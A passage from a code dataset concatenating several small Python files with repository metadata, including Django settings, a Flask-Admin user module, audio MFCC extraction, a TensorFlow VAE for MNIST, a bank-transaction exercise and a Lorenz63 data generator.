] | migueldavid006@hotmail.com |
81c774274ea1985459331e361032ea18dcb3b101 | a9fc477af17bd3aee3b59a228094e5a7ccf9c5e2 | /appform/choices.py | 717df9a1e1baa183586147f99fb374bcc7f1e9b1 | [] | no_license | mjtco-iscteiul/ESII-Progress | eb7acc2f90f3c288375433b153346fffc45a0c6c | 01d572e7266d8609acec90588b82d00b2d67a835 | refs/heads/master | 2021-01-25T14:40:25.869411 | 2018-03-13T18:14:42 | 2018-03-13T18:14:42 | 123,722,780 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 74 | py | type_choices=(
('Int', 'Int'),
('Db', 'Doub'),
('Bl', 'Bl')
)
| [
"mjtco@iscte-iul.pt"
] | mjtco@iscte-iul.pt |
0a6e9cc728f84ccf104a9a9a2f458f088fbc48e7 | c600ee683d0ecb4a2f17c76a174d60c0c61891f6 | /Speaker_And_Audience_activity_classification/Mfcc_Extraction.py | fd7de918c62559818faa4b3f5dee7407786882e5 | [] | no_license | sandepp123/Freelance-Project | db875d57e5f2c350352f6bbb988ae552b474c5e5 | 250940dbf504f836b2650c63644a630bb9aed2a6 | refs/heads/master | 2021-01-11T17:28:42.072155 | 2017-01-23T08:14:39 | 2017-01-23T08:14:39 | 79,781,063 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,938 | py | from Preprocessing import list_files
from scikits.talkbox.features import mfcc
import scipy
import librosa
import essentia, essentia.standard as ess
import pandas as pd
import numpy as np
#### MFCC Using Librosa Library *********not used****************** #####
def Extract_MFCC_Librosa(path,number_of_Mfcc=20,name="MFCC_Librosa_.csv"):
files=list_files(path,".wav")
for file in files:
x, fs = librosa.load(path+"/"+file)
mfccs = librosa.feature.mfcc(x, sr=fs) #mfccs
#### MFCC Using Scikit Talkbox Library #####
def Extract_MFCC_TalkBox(path,number_of_Mfcc=13,name="MFCC_Talk_Box.csv"):
files=list_files(path,".wav")
ci=0 #for keeping count of files and track of program
X,y,label=[],[],[]
for file in files:
prefix=file[:3] #will be used for labeling
sample_rate, X1 = scipy.io.wavfile.read(path+"/"+file) #Read wav file
ceps, mspec, spec = mfcc(X1) # ceps contains the mfcc
#write_ceps(path,file,ceps)
num_ceps=len(ceps) #eg. 100,13
X.append(np.mean(ceps[int(num_ceps*0.1):int(num_ceps*0.9)], axis=0))#mean is taken column wise mean([[0,0,0][1,2,4][3,2,1]])=[[4/3,4/3,5/3]]
y.append(file)
print ci, file
ci+=1
c=np.column_stack([X,y]) #adding file name to the extracted features respectively
np.savetxt(path+'/'+name, c, delimiter=',', fmt='%s') # saves Mfcc in the dataset folder
return c
#return c if want
#MFCC using Essentia*********not used******************
def Extract_Mfcc_Essetia(path):
hamming_window = ess.Windowing(type='hamming')
spectrum = ess.Spectrum()
mfcc = essentia.standard.MFCC(numberCoefficients=13)
frame_sz = 1024
hop_sz = 500
files=list_files(path,".wav")
for file in files:
x, fs = librosa.load(path+"/"+file)
mfccs = numpy.array([mfcc(spectrum(hamming_window(frame)) ) [1] for frame in essentia.standard.FrameGenerator(x, frameSize=frame_sz, hopSize=hop_sz)])
print mfccs.shape , " "+file
| [
"sandeep.pyc@gmail.com"
] | sandeep.pyc@gmail.com |
f36c0257d7334f35efab0927376708780699018b | d9383f0a8745c687e313c5182b1e035874d3ebad | /data_visualization_with_plotly/company_headcount/retrieve_company_data.py | 46da2537311d23d9e1be10e46cef1bb2c49a6994 | [] | no_license | madeleinema-cee/interview_coding_challenges | 336a1e4a55bca0ac852e7e56916bc6fa286c3c1a | 90b9184ded83e7425aaa9f2635fb25a192e8ded8 | refs/heads/main | 2023-04-14T19:36:45.489963 | 2021-05-03T17:32:05 | 2021-05-03T17:32:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,287 | py | from helpers.db import Db
class RetrieveCompanyData:
"""Contains all the functions to retrieve the data for
the django project
Attributes:
db (Db): headcount Db instance
query (str): query instance
"""
def __init__(self):
self.db = Db('company_headcount/headcount.db')
self.query = None
def main(self):
"""Method to call function sequentially
Returns:
self.parse_months(data) (arr): an array of months return by self.parse_months function
self.parse_company_data(data)(dict): an dict of companies and their monthly headcounts
returned by self.parse_company_data function
"""
data = self.retrieve_data()
return self.parse_months(data), self.parse_company_data(data)
def retrieve_data(self):
"""Retrieves company data to be preserved
Returns:
company data
"""
self.query = """
select c.company, h.month, h.headcount from headcount h
join company_headcount ch on ch.headcount_id = h.id
join company c on ch.company_id = c.id"""
results = self.db.fetchall(self.query)
return results
def parse_months(self, data):
"""Parse company data
Arguments:
data (arr): a array of dictionaries
Returns:
months data
"""
months = []
for row in data:
if row['month'] not in months:
months.append(row['month'])
return months
def parse_company_data(self, data):
"""Parse company data
Arguments:
data (arr): a array of dictionaries
Returns:
company and headcount data
"""
company_data = {}
for row in data:
company = row['company'].capitalize()
if company not in company_data:
company_data[company] = {
'headcount': [row['headcount']]
}
else:
if row['headcount'] not in company_data[company]['headcount']:
company_data[company]['headcount'].append(row['headcount'])
return company_data
| [
"noreply@github.com"
] | madeleinema-cee.noreply@github.com |
259f7b4331ec5008e4fe49e7e52a81a05c05e297 | 2d5815d3086fdd6379f879e13690506e415df318 | /GSApy/gsaerr.py | ab3aa2c19458af8cc1196119c37b65a9f9734b00 | [] | no_license | tonnerrek/MagelLANic-Cloud | 65e94c855e388ab84109cd58a3964361dbcfcc12 | be38a12ca94c7a06e57b256fff1cbd3f103908f2 | refs/heads/master | 2021-01-11T20:09:50.567156 | 2017-01-23T19:24:07 | 2017-01-23T19:24:07 | 79,054,867 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,216 | py | #!/usr/bin/env python
from sys import exit
class MSGColor:
#only for 16color terminals
map = {'black': '0m', 'red': '1m', 'green': '2m', 'yellow': '3m',
'blue': '4m', 'magenta': '5m', 'cyan': '6m', 'gray': '7m'}
bold = '1;'
lit = '9'
dim = '3'
clr = '\33[0m'
def msgCLR(colorid, txt, enlight=0, bold=0):
stx = '\33['
if bold != 0:
stx += MSGColor.bold
if enlight == 0:
stx += MSGColor.lit+MSGColor.map[str(colorid)]
else:
stx += MSGColor.dim+MSGColor.map[str(colorid)]
return stx+txt+MSGColor.clr
def errMSG(header, message, type='STD_ERR', var=''):
if type not in ('STD_ERR', 'VAR_ERR', 'STD_WRN'): raise ValueError("Bad message type in function errmsg ("+__name__+".py)")
if type == 'STD_ERR':
print msgCLR('red', "[ "+str(header)+" ] ", 1) + msgCLR('black', str(message))
if type == 'VAR_ERR':
print msgCLR('red', "[ "+str(header)+" ] ", 1) + msgCLR('black', str(message)) + msgCLR('yellow', str(var))
if type == 'STD_WRN':
print msgCLR('yellow', "[ "+str(header)+" ] ", 1) + msgCLR('black', str(message))
return
exit()
if __name__ == '__main__':
print msgCLR('red', "!THIS IS NOT STANDALONE SCRIPT!", 1)
| [
"m.zukey@gmail.com"
] | m.zukey@gmail.com |
9f379d63dda0327a8796ebfd044bfb5ad1b596d0 | ee6699fcaaf03c230343ed3432afea41dca448df | /hellojango/settings.py | 12bcfce247c58246df03d51e3b3d11ed4a780282 | [] | no_license | dangmc/hello-jango | 63caaddcbf6ac6f985a511080b0af6fffd65adf5 | 2ecfd15f1d7659b1c15ee7040339eefed3b92974 | refs/heads/master | 2023-04-19T23:49:06.665683 | 2021-05-09T13:00:54 | 2021-05-09T13:00:54 | 365,738,459 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,359 | py | """
Django settings for hellojango project.
Generated by 'django-admin startproject' using Django 3.0.8.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '8rzu288fbaa%zbxb0a^$hnqn5nlrm=^(20x1n#@bht+aw5aw%6'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
ALLOWED_HOSTS = ['hello-jango.herokuapp.com', '127.0.0.1']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'accounts',
'django_filters'
]
MIDDLEWARE = [
'whitenoise.middleware.WhiteNoiseMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'hellojango.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'hellojango.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/images/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static')
]
| [
"dangmc95@gmail.com"
] | dangmc95@gmail.com |
813eaf29b4b4374837f6acfd98ebb196f037da3f | fcc1566a5be75db2888fcfe265116db646f371d3 | /canella/admin/user.py | 99d99345838a8f71f660f657b840dfc8fdb3210c | [
"MIT"
] | permissive | mush42/Canella-CMS | 42ef94410d3009a64a5ae8dd6f6c209b816f9c14 | b5132c271a3b8840f0b165c62d14de6853a3e5ac | refs/heads/master | 2021-01-11T18:40:25.993093 | 2018-01-25T13:30:06 | 2018-01-25T13:30:06 | 79,596,685 | 8 | 2 | MIT | 2019-12-24T08:17:40 | 2017-01-20T20:44:38 | Python | UTF-8 | Python | false | false | 5,283 | py | from collections import OrderedDict
from flask import request, url_for, flash, redirect
from flask_security import current_user
from flask_security.utils import logout_user
from flask_admin import expose
from flask_admin import form
from flask_admin.model.form import InlineFormAdmin
from flask_admin.model.template import EndpointLinkRowAction
from flask_admin.contrib.sqla import ModelView
from flask_security.changeable import change_user_password
from jinja2 import Markup
from .. import app, db
from ..main import user_datastore
from ..babel import gettext, lazy_gettext
from ..user.models import User, Profile, Role
from ..util.wtf import FileSelectorField
from ..util.dynamicform import DynamicForm
from ..util.forms.register import CanellaRegisterForm, register_user
from ..util.forms.change_password import CanellaChangePasswordForm, change_password
from . import admin, CanellaModelView
class BaseUserAdmin(CanellaModelView):
def is_accessible(self):
return current_user.has_role('admin')
class UserAdmin(BaseUserAdmin):
list_template = 'canella/admin/user/list.html'
can_create = False
column_exclude_list = ['password', 'slug', 'profile']
form_excluded_columns = ['password', 'posts', 'profile', 'confirmed_at', 'slug']
column_extra_row_actions = [
EndpointLinkRowAction(icon_class="fa fa-lock", endpoint='.change_password', title=lazy_gettext("Change Password"), id_arg='pk'),
]
@expose('/<int:pk>/change-password/', methods=['GET', 'POST'])
def change_password(self, pk):
user = self.get_one(str(pk))
form = CanellaChangePasswordForm(user=user)
if form.validate_on_submit():
change_password(user, form.password.data)
db.session.commit()
if user.email == current_user.email:
logout_user()
flash(gettext('Password changed successfully'))
return redirect(url_for('.index_view'))
return self.render('admin/model/create.html', form=form)
@expose('/<int:pk>/deactivate/', methods=['GET', 'POST'])
def deactivate_user(self, pk):
if user.is_active:
user = self.get_one(str(pk))
user.is_active = False
db.session.commit()
flash(gettext('Account deactivated successfully'))
return redirect(url_for('.index_view'))
@expose('/<int:pk>/activate/', methods=['GET', 'POST'])
def activate_user(self, pk):
user = self.get_one(str(pk))
if not user.is_active:
user.is_active = True
db.session.commit()
flash(gettext('Account activated successfully'))
return redirect(url_for('.index_view'))
@expose('/register/', methods=['GET', 'POST'])
def register(self):
form = CanellaRegisterForm()
if form.validate_on_submit():
should_confirm = form.send_confirmation.data
del form.send_confirmation
register_user(should_confirm=should_confirm, **form.to_dict())
return redirect(url_for('.index_view'))
return self.render('admin/model/create.html', form=form)
class ProfileAdmin(BaseUserAdmin):
def on_form_prefill(self, form, id):
model = self.get_one(id)
for field in form:
if field.name.startswith('profile_extra__'):
field.data = model.get(field.name[15:])
def after_model_change(self, form, model, is_created):
for field in form:
if field.name.startswith('profile_extra__'):
model[field.name[15:]] = field.data
db.session.commit()
@property
def form_extra_fields(self):
"""Contribute the fields of profile extras"""
rv = OrderedDict(image_path=FileSelectorField(label=lazy_gettext('Profile Picture'), button_text=lazy_gettext('Select Profile Picture')))
extra_fields = list(app.config.get('PROFILE_EXTRA_FIELDS', []))
for field in DynamicForm(*extra_fields, with_admin=True).fields:
rv.setdefault('profile_extra__%s' %field[0], field[1])
return rv
def _list_thumbnail(view, context, model, name):
if not model.image_path:
return Markup('<span class="fa fa-2x fa-user"></span>')
return Markup('<img src="%s" class="img-thumbnail img-circle" style="max-width:75px;max-height:75px;" />' % model.image.src)
can_create = False
can_delete = False
column_exclude_list = ['user', 'created', 'extras']
column_list = ['image_path', 'first_name', 'last_name', 'updated']
column_formatters = dict(image_path=_list_thumbnail)
form_excluded_columns = ['user', 'image_description', 'extras', 'updated', 'created']
class RoleAdmin(BaseUserAdmin):
column_exclude_list = ['user']
admin.add_view(UserAdmin(User, db.session, name=lazy_gettext('User Accounts'), category=lazy_gettext('Users'), menu_icon_type='fa', menu_icon_value='fa-shield'))
admin.add_view(ProfileAdmin(Profile, db.session, name=lazy_gettext('Profiles'), category=lazy_gettext('Users'), menu_icon_type='fa', menu_icon_value='fa-user'))
admin.add_view(RoleAdmin(Role, db.session, name=lazy_gettext('Roles & Permissions'), category=lazy_gettext('Users'), menu_icon_type='fa', menu_icon_value='fa-lock')) | [
"Musharraf Omer"
] | Musharraf Omer |
2abeda39e8908452c1c0b37793f6fd7403db3217 | 83887f4f6a9d0c0dc4d7bde309ff024bb30772c9 | /model_vae.py | dd15fb8e21943b36c56fc2866f17c5f5791f56a8 | [] | no_license | Andreachen0707/stats_hw4 | 2842a7e9a0afba1c2111875497647d50c4ca9daa | 6dab2a54c60eb008d7bfc5830e2fe48e2a2f961e | refs/heads/master | 2020-03-09T01:01:57.960693 | 2018-04-07T06:44:05 | 2018-04-07T06:44:05 | 128,503,269 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,596 | py | from __future__ import division
import os
import time
from glob import glob
import tensorflow as tf
import numpy as np
import scipy.io as sio
from six.moves import xrange
from skimage import io
from ops import *
from utils import *
import random
import numpy as np
class VAE(object):
def __init__(self, sess, image_size=28,
batch_size=100, sample_size=100, output_size=28,
z_dim=5, c_dim=1, dataset_name='default',
checkpoint_dir=None, sample_dir=None):
"""
Args:
sess: TensorFlow session
image_size: The size of input image.
batch_size: The size of batch. Should be specified before training.
sample_size: (optional) The size of sampling. Should be specified before training.
output_size: (optional) The resolution in pixels of the images. [28]
z_dim: (optional) Dimension of latent vectors. [5]
c_dim: (optional) Dimension of image color. For grayscale input, set to 1. [1]
"""
self.sess = sess
self.batch_size = batch_size
self.image_size = image_size
self.sample_size = sample_size
self.output_size = output_size
self.z_dim = z_dim
self.c_dim = c_dim
self.dataset_name = dataset_name
self.checkpoint_dir = checkpoint_dir
self.sample_dir = sample_dir
self.build_model()
def encoder(self, image, reuse=False, train=True):
with tf.variable_scope("encoder", reuse=reuse) as scope:
#######################################################
# TODO: Define encoder network structure here. op.py
# includes some basic layer functions for you to use.
# Please use batch normalization layer after conv layer.
# And use 'train' argument to indicate the mode of bn.
# The output of encoder network should have two parts:
# A mean vector and a log(std) vector. Both of them have
# the same dimension with latent vector z.
#######################################################
reshape_input = tf.reshape(image, [-1, 28, 28, 1])
h0 = lrelu(batch_norm(conv2d(reshape_input, 16, name='e_h0_conv_vae'), train = train, name = 'e_batch_0_vae'))
h1 = lrelu(batch_norm(conv2d(h0, 32, name='e_h1_conv_vae'), train = train, name = 'e_batch_1_vae'))
h2 = lrelu(batch_norm(conv2d(h1, 64, name='e_h2_conv_vae'), train = train, name = 'e_batch_2_vae'))
# A flatten tensor with shape [h2.shape(0), k]
fc = tf.contrib.layers.flatten(h2)
mu = tf.layers.dense(fc, units = self.z_dim)
std = 0.5 * mu
epsilon = tf.random_normal(tf.stack([tf.shape(fc)[0], self.z_dim]))
z = mu + tf.multiply(epsilon, tf.exp(std))
#h3 = lrelu(batch_norm(conv2d(h2, 64*8, name = 'd_h3_conv'), train = train, name = 'd_batch_3'))
#h4 = linear(tf.reshape(h3, [self.batch_size, -1]), 1, 'd_h4_lin')
return z, mu, std
#######################################################
# end of your code
#######################################################
def decoder(self, z, reuse=False, train=True):
with tf.variable_scope("decoder", reuse=reuse):
#######################################################
# TODO: Define decoder network structure here. The size
# of output should match the size of images. To make the
# output pixel values in [0,1], add a sigmoid layer before
# the output. Also use batch normalization layer after
# deconv layer, and use 'train' argument to indicate the
# mode of bn layer. Note that when sampling images using
# trained model, you need to set train='False'.
#######################################################
h0 = tf.layers.dense(z, 64*7*7, name = 'd_ense2_vae')
h0_reshape = tf.reshape(h0, [self.batch_size, 7, 7, 64])
h0_deconv = deconv2d(h0_reshape, [self.batch_size, 7, 7, 32], d_w=1, d_h=1, name='d_conv1_vae')
h0 = lrelu(batch_norm(h0_deconv, train = train, name = 'd_bn_0_vae'))
h1_deconv = deconv2d(h0, [self.batch_size, 14, 14, 16], name = 'd_h1_vae')
h1 = lrelu(batch_norm(h1_deconv, train = train, name = 'd_bn_1_vae'))
h2_deconv = deconv2d(h1, [self.batch_size, 28, 28, 1], name = 'd_h2_vae')
h2 = lrelu(batch_norm(h2_deconv, train = train, name = 'd_bn_2_vae'))
h3_fc = tf.contrib.layers.flatten(h2)
h4 = tf.layers.dense(h3_fc, units = 28 * 28, activation = tf.nn.sigmoid)
img_out = tf.reshape(h4, shape=[-1, 28, 28])
return img_out
#######################################################
# end of your code
#######################################################
def build_model(self):
#######################################################
# TODO: In this build_model function, define inputs,
# operations on inputs and loss of VAE. For input,
# you need to define it as placeholders. Remember loss
# term has two parts: reconstruction loss and KL divergence
# loss. Save the loss as self.loss. Use the
# reparameterization trick to sample z.
#######################################################
self.X_inputs = tf.placeholder(dtype = tf.float32, shape=[self.batch_size, 28, 28, 1], name = 'x_vae')
Y = tf.reshape(self.X_inputs, shape = [-1, 28*28])
self.z_sample, mu_sample, sd_sample = self.encoder(self.X_inputs)
self.z_out = self.decoder(self.z_sample)
Y_out = tf.reshape(self.z_out, [-1, 28*28])
img_loss = tf.reduce_sum(tf.squared_difference(Y_out, Y), 1)
latent_loss = -0.5 * tf.reduce_sum(1.0 + 2.0 * sd_sample - tf.square(mu_sample) - tf.exp(2.0 * sd_sample), 1)
self.loss = tf.reduce_mean(img_loss + latent_loss)
#######################################################
# end of your code
#######################################################
self.saver = tf.train.Saver()
def train(self, config):
"""Train VAE"""
# load MNIST dataset
mnist = tf.contrib.learn.datasets.load_dataset("mnist")
data = mnist.train.images
data = data.astype(np.float32)
data_len = data.shape[0]
data = np.reshape(data, [-1, 28, 28, 1])
optim = tf.train.AdamOptimizer(config.learning_rate, beta1=config.beta1).minimize(self.loss)
try:
self.sess.run(tf.global_variables_initializer())
except:
tf.initialize_all_variables().run()
start_time = time.time()
counter = 1
if self.load(self.checkpoint_dir):
print(" [*] Load SUCCESS")
else:
print(" [!] Load failed...")
sample_dir = os.path.join(config.sample_dir, config.dataset)
if not os.path.exists(config.sample_dir):
os.mkdir(config.sample_dir)
if not os.path.exists(sample_dir):
os.mkdir(sample_dir)
for epoch in xrange(config.epoch):
batch_idxs = min(data_len, config.train_size) // config.batch_size
randoms = [np.random.normal(0,1,self.z_dim) for _ in range(100)]
for idx in xrange(0, batch_idxs):
counter += 1
batch_images = data[idx*config.batch_size:(idx+1)*config.batch_size, :]
#######################################################
# TODO: Train your model here, print the loss term at
# each training step to monitor the training process.
# Print reconstructed images and sample images every
# config.print_step steps. Sample z from standard normal
# distribution for sampling images. You may use function
# save_images in utils.py to save images.
#######################################################
_, loss, dec = self.sess.run([optim, self.loss, self.z_out], feed_dict={self.X_inputs: batch_images})
if np.mod(counter, 10) == 1:
samples = self.sess.run(
[self.z_out],
feed_dict={
self.z_sample:randoms,
}
)
imgs = np.reshape(samples,[-1,28,28,1])
save_images(imgs, [10,10], './{}/train_{:02d}_{:04d}.png'.format(config.sample_dir, epoch, idx))
#print("[Sample] d_loss: %.8f, g_loss: %.8f" % (vae_loss))
#######################################################
# end of your code
#######################################################
if np.mod(counter, 500) == 2 or (epoch == config.epoch-1 and idx == batch_idxs-1):
self.save(config.checkpoint_dir, counter)
imgs = np.reshape(dec,[-1,28,28,1])
save_images(imgs, [10,10], self.sample_dir+'/reconstruct_pic'+str(epoch)+'.png')
def save(self, checkpoint_dir, step):
model_name = "mnist.model"
model_dir = "%s_%s_%s" % (self.dataset_name, self.batch_size, self.output_size)
checkpoint_dir = os.path.join(checkpoint_dir, model_dir)
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
self.saver.save(self.sess,
os.path.join(checkpoint_dir, model_name),
global_step=step)
def load(self, checkpoint_dir):
print(" [*] Reading checkpoints...")
model_dir = "%s_%s_%s" % (self.dataset_name, self.batch_size, self.output_size)
checkpoint_dir = os.path.join(checkpoint_dir, model_dir)
ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
if ckpt and ckpt.model_checkpoint_path:
ckpt_name = os.path.basename(ckpt.model_checkpoint_path)
self.saver.restore(self.sess, os.path.join(checkpoint_dir, ckpt_name))
print(" [*] Success to read {}".format(ckpt_name))
return True
else:
print(" [*] Failed to find a checkpoint")
return False
| [
"andreachen0707@gmail.com"
] | andreachen0707@gmail.com |
0f65d46ae561c592837b870f9c64513c23ec0aa1 | d496e9b71a9cdc226c8005b7d1be53a0c9154a36 | /bankTransaction.py | 42e856699d126b93469811cccc9dbe9cf57a3130 | [] | no_license | Shubham-S-Yadav/Python | 1f83e4a28e304679e16829613d845e8eae6f3921 | 830537dd02b60bb9f00a9079556a0c9323a26c17 | refs/heads/master | 2021-07-03T06:39:06.150795 | 2017-09-22T14:05:01 | 2017-09-22T14:05:01 | 104,320,745 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,118 | py | '''
Write a program that computes the net amount of a bank account based a transaction log from file. The transaction log format is shown as following:
D 100
W 200
D means deposit while W means withdrawal.
Suppose the following input is supplied to the program:
D 300
D 300
W 200
D 100
Then, the output should be:
Total Deposit = 700
Total Withdrawal = 200
Total Balance = 500
'''
B = 0
D = 0
W = 0
while True:
transaction = input("Enter TYPE of transaction only [Deposite: D/Withdraw: W] ")
transaction1, transaction2 = transaction.split(" ")
print(transaction[0], transaction[2])
amount = int(transaction2)
if transaction1 == 'D' or transaction1 == 'd':
D = D + amount
B = B + amount
elif transaction1 == 'W' or transaction1 == 'w':
if B <= amount:
print("Not Sufficient Balance.\nTransaction failed.");
break
else:
B = B - amount
W = W + amount
elif transaction1 == 'E' or transaction1 == 'e':
break
else:
print("Invalid Input.")
print("Total Balance: Rs.", B)
print("Total Deposited amount: Rs.", D)
print("Total Withdrawal amount: Rs.", W) | [
"31968975+Shubham-S-Yadav@users.noreply.github.com"
] | 31968975+Shubham-S-Yadav@users.noreply.github.com |
c9401a9c4987563894c3464eff93b60aae22534e | e010333317fe8a90feb6f07a3ad8a44da0effea1 | /generate_Lorenz_data.py | 043b421aecd4c2a2c7e086daa7ec2ad591b4cfa5 | [] | no_license | xinjialimath/Takens_EnKF | f2bbcc8cab06efe1e0202212e89d118e148c652c | 380b021358f1286f818ecfa73d98e7edaafe25fc | refs/heads/master | 2023-02-06T17:36:58.736569 | 2020-12-27T15:25:05 | 2020-12-27T15:25:05 | 324,788,321 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,670 | py | import numpy as np
import os
import time,datetime
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from scipy.integrate import odeint
from Lorenz import Lorenz
from utils import lorenz63, hx_x, mkdir
from config import Config
from tqdm import tqdm
class Generate_Lorenz63_Data():
def __init__(self, config):
self.params = config.params #参数
self.z_dim = config.z_dim # dimension of measurement
self.x_dim = len(config.initial_states)
self.initial_states = config.initial_states
self.h = config.h
self.dt = config.dt
self.end = config.end
self.R = config.R
self.Q = config.Q
self.t = np.arange(0, config.end, config.dt)
self.epoch = int(config.end / config.dt) + 1
self.states_clean_list = list()
self.states_list = list()
self.measures_list = list()
self.states_params_list = list() #all_states = states (x,y,z) and params
self.states_params_clean_list = list()
self.gt_ode = None
self.gt_Euler = None
self.lorenz_dir = None
self.figure_dir = None
self.data_dir = None
def initial_config_and_dirs(self, index):
# dateArray = datetime.datetime.fromtimestamp(time.time())
# self.begin_time = dateArray.strftime("%Y_%m_%d_%H_%M_%S")
# self.lorenz_dir = '../Lorenz_data/' + self.begin_time
self.lorenz_dir = '../Lorenz_data/' + str(index)
self.figure_dir = os.path.join(self.lorenz_dir, 'figures')
self.data_dir = os.path.join(self.lorenz_dir, 'data')
mkdir(self.lorenz_dir)
mkdir(self.figure_dir)
mkdir(self.data_dir)
#save config
f = open(os.path.join(self.lorenz_dir, 'config.txt'), mode='a+')
# config_dict = config.__dict__
# for key,value in config_dict:
# if key in ['params', 'initial_states', 'dt', 'end', 'h', 'epoch']:
# f.writelines('{}: {}\r'.format(key,value))
f.writelines('{}: {}\r'.format('params',self.params))
f.writelines('{}: {}\r'.format('initial_states',self.initial_states))
f.writelines('{}: {}\r'.format('dt',self.dt))
f.writelines('{}: {}\r'.format('end',self.end))
f.writelines('{}: {}\r'.format('h',self.h))
f.writelines('{}: {}\r'.format('epoch',self.epoch))
f.writelines('{}: {}\r'.format('R',self.R))
f.writelines('{}: {}\r'.format('Q',self.Q))
f.writelines('{}: {}\r'.format('z_dim',self.z_dim))
f.close()
def GT_from_odeint(self,save_name='lorenz63_gt_ode.jpg'):
#Ground truth by odeint
self.gt_ode = odeint(lorenz63, tuple(self.initial_states), self.t)
x_ode = self.gt_ode[:, 0]
y_ode = self.gt_ode[:, 1]
z_ode = self.gt_ode[:, 2]
fig = plt.figure()
ax = Axes3D(fig)
ax.plot(x_ode, y_ode, z_ode, 'b')
plt.title('Lorenz63 system, ground truth from odeint, $x_0$={},$y_0$={},$z_0$={}'.format(
self.initial_states[0], self.initial_states[1], self.initial_states[2]))
plt.xlabel('x')
plt.ylabel('y')
# plt.show()
plt.savefig(os.path.join(self.figure_dir, save_name))
plt.close()
def GT_from_Euler(self,save_name='lorenz63_gt_Euler.jpg'):
# Ground truth by Euler
lorenz = Lorenz(self.params, self.initial_states, delta_t=self.dt)
self.gt_Euler = list()
for i in range(len(self.t)):
x = lorenz.run()
self.gt_Euler.append([x[-3], x[-2], x[-1]])
self.gt_Euler = np.array(self.gt_Euler)
fig = plt.figure(figsize=(12, 6))
ax = fig.gca(projection='3d') # 获取当前子图,指定三维模式
ax.plot(self.gt_Euler[:, 0], self.gt_Euler[:, 1], self.gt_Euler[:, 2], lw=1.0, color='b') # 画轨迹1
plt.title('Lorenz system,$x_0$={},$y_0$={},$z_0$={}'.format(
self.initial_states[0], self.initial_states[1], self.initial_states[2]))
plt.xlabel('x')
plt.ylabel('y')
# plt.show()
plt.savefig(os.path.join(self.figure_dir, save_name))
plt.close()
def save_gt(self, method='Euler'):
# save data
assert method in ['odeint', 'Euler']
if method == 'Euler':
data = self.gt_Euler
else:
data = self.gt_ode
sample_state = []
save_path = os.path.join(self.data_dir, 'gt_{}_state.npy'.format(method))
for i in range(self.gt_Euler.shape[0]):
if i % self.h == 0:
sample_state.append(data[i, :])
sample_state = np.array(sample_state)
np.save(save_path, sample_state)
def GT_noise_from_Euler(self):
initial_states = np.array(self.initial_states)
states = initial_states #+ self.Q * np.ones(self.x_dim) #np.diagonal(np.eye()) #system noise
measures = hx_x(states) + self.R * np.ones(self.z_dim)
self.states_list.append(states)
self.measures_list.append(measures)
self.states_clean_list.append(initial_states)
for i in range(self.epoch - 1):
states_clean = lorenz63(states, self.dt)
states = states_clean + np.sqrt(self.Q) * np.random.normal(size=self.x_dim)
measures = hx_x(states) + np.sqrt(self.R) * np.random.normal(size=self.z_dim)
self.states_list.append(states)
self.measures_list.append(measures)
self.states_clean_list.append(states_clean)
self.states_params_list.append(np.hstack((states, np.array(self.params))))
self.states_params_clean_list.append(np.hstack((states_clean, np.array(self.params))))
np.save(os.path.join(self.data_dir, 'states_clean.npy'), np.array(self.states_clean_list))
np.save(os.path.join(self.data_dir, 'states.npy'), np.array(self.states_list))
np.save(os.path.join(self.data_dir, 'states_params_clean.npy'), np.array(self.states_params_clean_list))
